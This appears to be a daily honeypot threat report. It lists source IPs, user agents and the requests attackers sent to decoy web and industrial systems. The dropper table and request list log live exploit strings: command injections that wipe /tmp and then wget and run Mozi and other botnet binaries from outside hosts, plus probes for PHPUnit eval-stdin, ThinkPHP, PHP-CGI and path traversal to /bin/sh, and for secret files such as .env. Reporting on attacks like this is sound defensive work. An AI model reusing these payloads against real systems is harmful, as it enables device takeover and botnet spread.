Table of Contents

Daily Report: 2025-02-20
#

interaction report on http service of various Hhoneypot around the world.

OT report simplified
Botnet dropper behaviour
List of source IP addresses
List of user_agent
List of request
List of country_iso_code

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
PL	Dubai
US	Dubai
CN	Georgia

botnet_dropper_behaviour
#

remote_addr	request
221.15.186.233	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://221.15.186.233:58183/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
45.230.66.27	GET /shell?cd+/tmp;rm+-rf+*;wget+http://45.230.66.27:10529/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
121.231.99.27	GET /shell?cd+/tmp;rm+-rf+*;wget+http://121.231.99.27:57203/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
27.215.84.91	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://27.215.84.91:51040/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
39.87.13.136	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://39.87.13.136:59404/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
219.73.115.226	GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.189.31.150/jawsarm;chmod+777+/tmp/jawsarm;sh+/tmp/jawsarm HTTP/1.1
77.239.220.143	GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
115.236.79.230	GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.189.31.150/jawsarm;chmod+777+/tmp/jawsarm;sh+/tmp/jawsarm HTTP/1.1
219.77.30.173	GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.189.31.150/jawsarm;chmod+777+/tmp/jawsarm;sh+/tmp/jawsarm HTTP/1.1
91.224.92.10	POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F45.125.66.114%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1

list_of_source_IP_addresses
#

	number_of_occurence	remote_addr
0	98	91.224.92.10
1	72	45.148.10.90
2	60	193.68.89.10
3	58	45.148.10.34
4	45	152.32.172.115
5	45	116.196.87.121
6	45	171.244.40.20
7	45	45.116.77.28
8	39	92.255.57.58
9	35	141.255.166.90
10	32	193.68.89.51
11	28	151.115.96.143
12	26	185.16.38.107
13	20	176.65.137.182
14	17	195.178.110.163
15	16	194.120.230.215
16	15	80.82.77.202
17	13	93.174.93.12
18	12	115.231.78.11
19	12	161.35.181.13
20	12	134.199.158.187
21	10	78.153.140.149
22	9	196.251.72.73
23	9	46.19.138.210
24	8	178.211.139.120
25	8	174.138.62.1
26	8	3.14.9.161
27	8	41.216.188.18
28	8	46.19.143.10
29	8	193.23.3.37
30	6	64.23.201.216
31	5	3.19.65.144
32	5	157.245.45.5
33	5	18.222.142.117
34	5	123.160.223.73
35	5	34.201.23.93
36	5	207.90.244.3
37	5	185.189.182.234
38	5	172.245.40.162
39	5	18.188.117.89
40	5	143.198.50.113
41	4	179.43.191.146
42	4	193.68.89.31
43	4	185.242.226.10
44	4	196.251.70.31
45	4	196.251.118.68
46	4	129.146.60.2
47	4	185.247.137.224
48	4	4.247.129.170
49	3	103.139.45.123
50	3	47.239.167.2
51	3	50.193.186.74
52	3	150.107.38.40
53	3	104.234.115.69
54	3	45.92.19.136
55	3	65.49.20.66
56	3	74.82.47.2
57	3	123.160.223.74
58	3	165.154.11.210
59	3	165.154.11.247
60	3	65.49.20.68
61	3	167.94.138.125
62	3	162.142.125.214
63	3	46.19.143.26
64	3	167.94.138.195
65	2	138.68.139.95
66	2	170.203.143.191
67	2	185.16.36.157
68	2	75.131.174.170
69	2	167.86.121.18
70	2	206.168.34.70
71	2	206.168.34.213
72	2	167.94.145.110
73	2	167.94.138.49
74	2	5.101.0.66
75	2	139.59.169.154
76	2	205.210.31.216
77	2	167.94.138.192
78	2	168.253.90.155
79	2	172.104.11.4
80	2	176.65.142.130
81	2	167.94.145.106
82	2	167.94.145.104
83	2	91.225.218.111
84	2	203.55.131.3
85	2	45.79.181.223
86	2	37.46.113.235
87	2	172.206.141.170
88	2	64.62.197.224
89	2	185.242.226.115
90	2	45.156.128.45
91	2	185.242.226.80
92	2	121.231.99.27
93	2	198.235.24.209
94	2	78.153.140.148
95	2	92.246.87.21
96	2	123.160.223.75
97	2	185.242.226.153
98	2	147.185.132.93
99	2	71.6.134.235
100	2	45.148.10.186
101	2	106.1.175.70
102	2	205.210.31.224
103	2	51.254.59.113
104	1	34.77.196.179
105	1	103.138.4.16
106	1	198.235.24.72
107	1	46.52.164.170
108	1	194.233.85.71
109	1	118.194.250.95
110	1	177.7.160.254
111	1	125.228.157.93
112	1	185.247.137.220
113	1	172.206.141.246
114	1	135.148.25.122
115	1	135.148.25.127
116	1	103.253.154.185
117	1	43.153.10.13
118	1	8.221.140.46
119	1	1.34.126.178
120	1	36.91.220.34
121	1	102.141.9.154
122	1	64.62.197.214
123	1	64.62.197.94
124	1	194.85.251.34
125	1	114.35.175.166
126	1	114.35.124.60
127	1	172.105.128.11
128	1	2.45.168.11
129	1	114.33.143.118
130	1	217.142.184.125
131	1	111.7.96.172
132	1	123.160.223.72
133	1	80.82.70.133
134	1	69.164.217.245
135	1	213.32.32.84
136	1	219.77.30.173
137	1	59.126.254.42
138	1	220.134.152.134
139	1	151.249.107.219
140	1	46.109.67.118
141	1	51.254.0.10
142	1	37.59.165.80
143	1	104.152.52.235
144	1	163.172.53.10
145	1	185.124.180.190
146	1	66.240.205.34
147	1	47.237.115.100
148	1	59.126.136.199
149	1	91.82.63.76
150	1	51.81.181.169
151	1	147.135.85.131
152	1	220.133.162.246
153	1	178.19.174.250
154	1	168.232.14.24
155	1	94.248.130.235
156	1	52.29.55.190
157	1	59.127.84.223
158	1	213.32.32.93
159	1	91.196.152.31
160	1	91.196.152.25
161	1	221.122.67.75
162	1	45.156.128.47
163	1	196.251.69.18
164	1	114.33.126.178
165	1	185.147.124.49
166	1	45.156.128.130
167	1	62.64.9.53
168	1	103.184.194.245
169	1	82.99.230.98
170	1	205.196.214.14
171	1	68.183.137.128
172	1	220.132.99.110
173	1	147.185.133.185
174	1	47.89.193.162
175	1	205.210.31.219
176	1	147.185.133.140
177	1	45.156.130.45
178	1	5.202.114.105
179	1	170.106.113.159
180	1	64.62.156.22
181	1	34.22.192.129
182	1	64.62.156.10
183	1	64.62.156.20
184	1	219.73.115.226
185	1	64.62.197.186
186	1	125.228.130.9
187	1	146.70.201.212
188	1	47.88.87.97
189	1	46.139.110.45
190	1	36.66.231.15
191	1	162.216.150.22
192	1	198.235.24.222
193	1	103.203.56.2
194	1	162.216.150.58
195	1	221.15.186.233
196	1	45.230.66.27
197	1	198.235.24.150
198	1	39.87.13.136
199	1	122.117.239.244
200	1	59.127.95.120
201	1	27.215.84.91
202	1	162.215.216.231
203	1	13.64.49.213
204	1	103.42.201.36
205	1	86.142.49.77
206	1	91.214.84.225
207	1	117.198.13.201
208	1	172.104.11.34
209	1	45.156.130.4
210	1	64.62.156.86
211	1	18.218.241.81
212	1	147.185.132.236
213	1	198.235.24.85
214	1	115.236.79.230
215	1	174.138.61.44
216	1	45.156.128.126
217	1	95.32.8.245
218	1	184.105.247.194
219	1	162.216.150.80
220	1	77.239.220.143
221	1	45.156.128.41
222	1	34.77.181.91
223	1	196.251.66.193
224	1	35.203.211.143
225	1	147.185.132.39
226	1	103.207.125.55
227	1	220.133.134.26
228	1	2.58.56.13
229	1	67.243.143.203
230	1	120.61.28.83
231	1	125.228.91.168
232	1	198.235.24.88
233	1	66.94.102.10
234	1	165.84.166.194
235	1	104.152.52.241
236	1	51.15.21.147
237	1	172.168.159.108
238	1	45.164.177.158
239	1	45.164.177.7

user_agent
#

	number_of_occurence	user_agent
0	219	-
1	172	Custom-AsyncHttpClient
2	132	l9explore/1.2.2
3	116	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
4	98	Mozila/5.0
5	36	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
6	28	curl/7.88.1
7	24	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3
8	20	Mozilla/5.0 (X11; Linux x86_64)
9	14	Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com
10	12	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36
11	12	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
12	11	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
13	11	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
14	10	Mozilla/5.0 (compatible)
15	9	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36
16	9	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
17	9	Mozilla/5.0
18	8	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
19	8	xfa1
20	8	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
21	8	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0
22	8	Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
23	8	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
24	8	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
25	6	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
26	5	l9tcpid/v1.1.0
27	5	Mozilla/5.0 (Linux; Android 9; SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
28	5	Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
29	5	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
30	4	Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
31	4	Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
32	4	ELinks (0.4pre5; Linux 2.6.10-ac7 i686; 80x33)
33	4	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
34	3	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
35	3	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3
36	3	python-requests/2.32.3
37	3	Mozilla/5.0 zgrab/0.x
38	3	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
39	3	Hello, world
40	3	SonyEricssonW580i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1
41	2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7
42	2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
43	2	curl/8.1.2
44	2	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
45	2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
46	2	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
47	2	Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36
48	2	Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1
49	2	Mozilla/5.0 (Windows NT 6.1; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.156 Not(A:Brand/24 YaBrowser/24.4.1.901 Yowser/2.5 Safari/537.36
50	2	Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
51	2	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
52	2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
53	2	python-requests/2.26.0
54	2	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
55	2	Java/20.0.1
56	2	Mozilla/5.0 (Linux; Android 7.0; LG-H820) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
57	2	masscan/1.3 (https://github.com/robertdavidgraham/masscan)
58	2	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Iron Safari/537.36
59	2	Go-http-client/1.1
60	2	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
61	2	Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0
62	1	‘Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)’
63	1	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
64	1	Mozilla/5.0 (Linux; U; Android 1.6; en-us; HTC_TATTOO_A3288 Build/DRC79) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
65	1	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 OPR/62.0.3331.116
66	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36
67	1	Mozilla/5.0 (Linux; Android 8.1.0; GM 6 d) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
68	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
69	1	Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
70	1	POLARIS/6.01 (BREW 3.1.5; U; en-us; LG; LX265; POLARIS/6.01/WAP) MMP/2.0 profile/MIDP-2.1 Configuration/CLDC-1.1
71	1	Mozilla/5.0 (Linux; Android 7.1.2; Redmi 4X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
72	1	curl/7.64.1
73	1	Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
74	1	‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36’
75	1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
76	1	Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36
77	1	Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/535.22+ (KHTML, like Gecko) Chromium/17.0.963.56 Chrome/17.0.963.56 Safari/535.22+ Epiphany/2.30.6
78	1	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Whale/1.5.75.9 Safari/537.36
79	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
80	1	Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
81	1	Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95/10.0.018; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.3.0.0.0
82	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
83	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.42 Safari/537.36
84	1	Mozilla/5.0 (Linux; Android 8.0.0; XT1650) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36
85	1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
86	1	Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36
87	1	Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9
88	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
89	1	Mozilla/3.01Gold (Win95; I)
90	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36
91	1	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36
92	1	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
93	1	Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36
94	1	Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12
95	1	Mozilla/5.0 (OS/2; U; OS/2; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Arora/0.11.0 Safari/533.3
96	1	Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) OPT/1.10.1 Mobile/15E148
97	1	Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko
98	1	Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; XBLWP7; ZuneWP7) UCBrowser/2.9.0.263
99	1	Mozilla/5.0 (Linux; Android 8.1; PBBM00 Build/O11019) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 YaBrowser/17.6.1.345.00 Mobile Safari/537.36
100	1	Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
101	1	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
102	1	Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/80.0.262003652 Mobile/16F203 Safari/604.1
103	1	Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; BNTV250 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Safari/533.1
104	1	CSSCheck/1.2.2
105	1	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
106	1	curl/7.29.0
107	1	Mozilla/5.0 (Linux; Android 9; SM-G955F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
108	1	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
109	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 9_1_2) AppleWebKit/555.42 (KHTML, like Gecko) Chrome/71.0.1699 Safari/537.36
110	1	Mozilla/5.0 (Windows NT 6.2; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
111	1	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3730.0 Safari/537.36
112	1	Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
113	1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 OPR/60.0.3255.70
114	1	Mozilla/5.0 (Linux; Android 4.4.2; GT-N8000) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Safari/537.36
115	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15
116	1	Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7
117	1	Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
118	1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
119	1	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
120	1	Mozilla/5.0 (iPad; CPU OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1
121	1	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
122	1	Mozilla/5.0 (OS/2; Warp 4.5; rv:31.0) Gecko/20100101 Firefox/31.0 SeaMonkey/2.28
123	1	curl/7.81.0
124	1	r00ts3c-owned-you
125	1	Mozilla/5.0 (Windows NT 6.1; rv:102.0) Gecko/20100101 Goanna/6.6 Firefox/102.0 PaleMoon/33.0.0
126	1	HTTP Banner Detection (https://security.ipip.net)
127	1	Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15
128	1	masscan/1.0 (https://github.com/robertdavidgraham/masscan)
129	1	Mozilla/5.0 (Linux; Android 11; SM-A515F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.58 Mobile Safari/537.36

request
#

	number_of_occurence	request
0	308	GET / HTTP/1.1
1	98	POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F45.125.66.114%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1
2	55	GET / HTTP/1.0
3	40	GET /.env HTTP/1.1
4	36	GET /cgi-bin/luci/;stok=/locale HTTP/1.1
5	22	GET /favicon.ico HTTP/1.1
6	21	GET /.git/config HTTP/1.1
7	20	GET /json/wallet.json HTTP/1.1
8	15	\x16\x03\x02\x01o\x01\x00\x01k\x03\x02RH\xC5\x1A#\xF7:N\xDF\xE2\xB4\x82/\xFF\x09T\x9F\xA7\xC4y\xB0h\xC6\x13\x8C\xA4\x1C=\x22\xE1\x1A\x98 \x84\xB4,\x85\xAFn\xE3Y\xBBbhl\xFF(=’:\xA9\x82\xD9o\xC8\xA2\xD7\x93\x98\xB4\xEF\x80\xE5\xB9\x90\x00(\xC0
9	12	POST / HTTP/1.1
10	6	GET /admin/assets/js/views/login.js HTTP/1.0
11	6	GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
12	5	MGLNDD_xxx.xxx.xxx.xxx_80
13	5	SSH-2.0-Go
14	5	GET /login.html HTTP/1.1
15	5	\x16\x03\x01\x01
16	5	GET /geoserver/web/ HTTP/1.1
17	4	GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1
18	4	GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
19	4	GET /containers/json HTTP/1.1
20	4	GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
21	4	GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
22	4	GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
23	4	GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
24	4	GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1
25	4	GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
26	4	GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
27	4	GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
28	4	GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
29	4	GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1
30	4	GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
31	4	GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
32	4	GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
33	4	POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
34	4	POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
35	4	POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
36	4	GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1
37	4	GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
38	4	GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
39	4	GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
40	4	GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
41	4	GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
42	4	GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
43	4	GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
44	4	GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
45	4	GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
46	4	GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
47	4	GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
